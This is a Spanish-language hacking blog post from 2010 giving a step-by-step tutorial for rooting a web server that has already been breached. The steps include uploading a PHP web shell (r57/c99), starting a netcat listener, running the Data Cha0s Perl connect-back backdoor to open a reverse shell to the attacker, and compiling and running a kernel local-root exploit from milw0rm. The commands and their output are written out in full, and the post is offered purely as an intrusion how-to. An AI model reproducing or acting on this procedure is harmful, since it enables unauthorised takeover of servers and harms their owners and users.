domingo, 5 de septiembre de 2010

Como rootear? :: Easy Tutorial By Zer0 z0orG

Bueno Primero necesitamos tener lo siguiente:

* 1 phpshell (r57, c99, c40, etc).
* 1 Backshell ejemplo la datacha0s.
* Netcat
* Suficientes permisos para subiry ejecutar xD.

Ya suponiendo que tenemos la phpshell en x web donde queremos ser root del server, nos fijamos en la version del kernel, despues nos vemos a milw0rm o a google y buscamos el local root exploit para la version del kernel y ya obteniendo el local root exploit lo subimos junto con la backshell a la web a travez de la phpshell.

Ahora vamos a poner ala escucha el puerto donde queremos que se conecte el server a nuestra pc.
como?
Nos vamos a inicio/ejecutar/cmd y despues en la consola nos vamos a donde tenemos netcat,
ejemplo si lo pusimos en c: hacemos lo siguiente:
C:\Documents and Settings\Administrador>cd..
C:\Documents and Settings>cd..
C:\>
Luego tecleamos nc -lvvp puerto que queramos... ejemplo: nc -lvvp 21
C:\>nc -lvvp 21
listening on [any] 21 ...
Ok ya esta ala escucha el puerto 21.

Nos vamos ala phpshell y ejecutamos la backshell para que se conectarnos a nuestra pc:
perl nombredelabackshell.pl tuip puerto que pusimos ala escucha...ejemplo:
perl dc.pl 127.0.0.1 21

Y nos dira lo siguiente:
Data Cha0s Connect Back Backdoor

[*] Dumping Arguments
[*] Connecting...
[*] Spawning Shell
[*] Datached

Ahora vamos a netcat y vemos si en realidad conecto, en caso que aya conectado aparecera lo siguiente, ejemplo:
connect to [127.0.0.1] xweb.com [127.0.0.1] 57566

y en caso de que no conecte seguira apareciendo:
listening on [any] 21 ...

De lo contrario ya estaremos conectados al server desde nuestra pc.

Ahora compilaremos el local root exploit, en netcat tecleamos lo siguiente:

gcc nombre del local root exploit -o nombre del binario

ejemplo:
gcc bad.c -o bad

Despues le daremos permisos de lectura, escritura y ejecucion, de la siguiente manera:

chmod -c 777 bad

Luego ejecutamos el binario, asi:
./bad

ahora si todo salio bien y es vulnerable el kernel

al final de lo que nos diga la backshell ejecutada nos dira lo siguiente:

uid=0(root) gid=0(root) groups=48(apache)

y listo ya tenemos uid(0) de root =).

Nota: Espero sea entendible y luego subo imagenes.

Nota2: Checa con la phpshell que puertos tiene abiertos el server, para asi escojer alguno para conectar.

Nota3: si lo copias y lo pegas en otro lado no olvides su autor osease yo Zer0 z0orG xDD.

1 comentario:

Unknown dijo...

Muy buena info :P me ha servido